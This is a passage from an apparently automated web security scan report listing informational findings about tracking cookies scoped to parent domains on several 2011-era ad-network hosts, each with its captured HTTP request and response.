GET /pixel?partnerID=79&code=285379&code=302775&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD00OSwxMjMiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGJvcmRlcj0iMCI%2BPC9pbWc%2BPHNjcmlwdCBzcmM9Imh0dHA6Ly9zZWdtZW50LXBpeGVsLmludml0ZW1lZGlhLmNvbS9waXhlbD9wYXJ0bmVySUQ9NzkmY29kZT0yODUzNzkmY29kZT0zMDI3NzUma2V5PXNlZ21lbnQmcmV0dXJuVHlwZT1qcyI%2BPC9zY3JpcHQ%2BPGltZyBzcmM9Imh0dHA6Ly9hLmNvbGxlY3RpdmUtbWVkaWEubmV0L2RhdGFwYWlyP25ldD1leCZzZWdzPTc2LDMyJm9wPWFkZCIgd2lkdGg9IjEiIGhlaWdodD0iMSI%2BPC9pbWc%2B&h=801802b5e74884030c94b77c781c1c27
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]}"; subID="{}"; dp_rec="{\"2\": 1295634039}"; segments="30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 24 Jan 2011 21:07:11 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 24-Jan-2011 21:06:51 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Content-Length: 488

makePixelRequest("http://ad.doubleclick.net/activity;src=1946758;dcnet=4591;boom=30274;sz=1x1;ord=1","image");makePixelRequest("http://ad.doubleclick.net/activity;src=1946758;dcnet=4591;boom=30275;sz=
...[SNIP]...

13.152. http://segment-pixel.invitemedia.com/unpixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /unpixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • segments="3391|3392|30767|11262|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 22:20:55 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /unpixel?pixelID=16681&partnerID=159&clientID=2781&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]}"; subID="{}"; dp_rec="{\"2\": 1295634039}"; segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 24 Jan 2011 22:20:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 24-Jan-2011 22:20:35 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments="3391|3392|30767|11262|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 22:20:55 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.153. http://shopping.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: shopping.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:01 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0041639804840088
X-Served-In: 0.046626806259155
X-Served-By: h00
Content-Length: 42519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.154. http://smallbusinessnews.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smallbusinessnews.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: smallbusinessnews.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:10 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0054209232330322
X-Served-In: 0.042685031890869
X-Served-By: ded2060
Content-Length: 44487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...

13.155. http://smp.specificmedia.com/smp/v=5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.specificmedia.com
Path:   /smp/v=5

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • smu=5046.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
  • smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smp/v=5;m=1;t=2568;ts=1295903195040 HTTP/1.1
Host: smp.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smu=5051.928757113086138685

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:06:42 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5046.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
Set-cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://cache.specificmedia.com/creative/blank.gif
Connection: close
Content-Type: text/html
Content-Length: 412

<head><title>Moved</title>
<body>This object has moved to <a href="http://cache.specificmedia.com/creative/blank.gif">http://cache.specificmedia.com/creative/blank.gif</a></body>
<!DOCTYPE HTML PUBLIC
...[SNIP]...

13.156. http://su.addthis.com/red/usync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://su.addthis.com
Path:   /red/usync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; Domain=.addthis.com; Expires=Thu, 24-Jan-2013 01:35:49 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=2&puid=914803576615380,rcHW800iZiMAAocf HTTP/1.1
Host: su.addthis.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; uid=4d1ec56b7612a62c; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; Domain=.addthis.com; Expires=Thu, 24-Jan-2013 01:35:49 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Tue, 25 Jan 2011 01:35:49 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

13.157. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=.at.atwola.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rtx/r.js?cmd=AGU&si=17295&pi=M&xs=3&pu=http%253A//www.autobytel.com/x22%2526ifu%253Dhttp%25253A//burp/show/31&v=5.5&cb=96663 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZpZjE3YTBrcTBiZ2Q=; ANRTT=60848^1^1296494968; TData=99999|^|56780|60739|#|60848; Anxd=x; N=2:faabfca985572b481d74a4897e4d9013,71e5fe306b3f97af479b09e96a0ca00a; ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg=

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 24 Jan 2011 21:21:44 GMT
Set-Cookie: ANRTT=60848^1^1296494968|62722^1^1296508004; path=/; expires=Mon, 31-Jan-11 21:06:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1295903204^1295905004|17295^1295903204^1295905004; path=/; expires=Mon, 24-Jan-11 21:36:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Tue, 25-Jan-11 03:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:71e5fe306b3f97af479b09e96a0ca00a,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 128
Content-Type: application/x-javascript
Content-Length: 128

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|56780|60739|#|60848|62722';
ANRTXR();


13.158. http://tags.bluekai.com/site/10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/10

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
  • bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJ0fyXF9XJlJlJKHRH/q9T1wLfAFvT1AcyBe3gTVD9y9Uh9aYy==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0XtExLxebEKLRWOEvz61pOXhbJFah1e9pBe3EDeyT3qbfCTgWet1w9011QZ1evAbZ+ONx49NDLpQPD9xj9OLh19DDoQSQ==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxgyXR9wBpxh1n/6LnutBe/6+e9pBMRtwNJFf9QY26izl; bk=dOTA6tBCxZ/sHNJo; bkc=KJhnRtPQrOgmyceoM3DF/y1exh3xnXsn0G2Cx4O8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImc1DeTdkeISiT/dfKyoiXpxT1+isd5iLg4FO7OgTKb+T9jGCdWM64MdTC9XYmj/Kol18Ae2EmOIzt03wyah3MXCVMXvePsmwXeNn6wZueZQdQOlvCX83IGdO8tHMi47hridpRulXLRk4dLs0o4VJGHpA2ACmMd+XF9ky7v72KBTewyxrHE2qU9bAaXh68DdkDPHCEIUMPDF3xbv+dS9jUFQzSUEDeyK2QC27XahCK1qhIc0759TXFV/FicGmsg7vRW82+hGdJ8eicT7WYIRy13wbDjkq2FmG/w9BZIKeT=

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:06:44 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 430
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://cm.g.doubleclick.net/pixel?nid=bluekai&" width=1 height=1 border=0 alt="">
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=9EB
...[SNIP]...

13.159. http://tags.bluekai.com/site/2981

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2981

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • bk=QbmOT/N77lGsHNJo; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bkc=KJh56q2nQAWROde7lg4u4clJzY7iUu3LU9Gzp1EunRvUs3J4ueIQC9Sh4X9DoWa0qTLS7Og5iC3AF0Oy3iV/GvlaYQngpgFlprKsspfz2lFlzaKl9OqXOwTIDiTOQegNFmjLc6QcbYoxFdUTVcBVXp9G8dGOVoL9E0XJbHWqZdD2t6s9EGM9R0ArdEt9p4vKNd696Eh9dkH8VMwnK2TxXbTvlyuT4X1pgQ7kacw0enFHDYbJKD21lZ4K6d0poqh+XF05WS52GIrvQl6PyffVFO1C6o2ilkKe7XIXjZsqqK0SM6Qwi422fFavewF2YpLXH3xwYm2lqr5zxdM0UOkLF7X6sIlZZEBPfBRAxqbwR/2mRu4Et1rS7UlkZGd4lbqd8Ukoapr+tuA3BXUfErEsoHz+fsOEKj9bDXRIgs9dUYMd98GNMVx=; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bko=KJhE8VPQIwduNoKHRH/q9X1E//rByjLUyZJAAmmeLKT9hqTpZxBjAAYhPc6+/9L9bD6mSx==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwkJFfQL9Y79pPy==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
  • bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4Uz4aRQKhCTsPQAWNQjWMPNTv3eTYgkySfYyuYeJi5P+ZiIyw5UxrRxY88RL49Wwmq1hz9d63VjQ==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1& HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
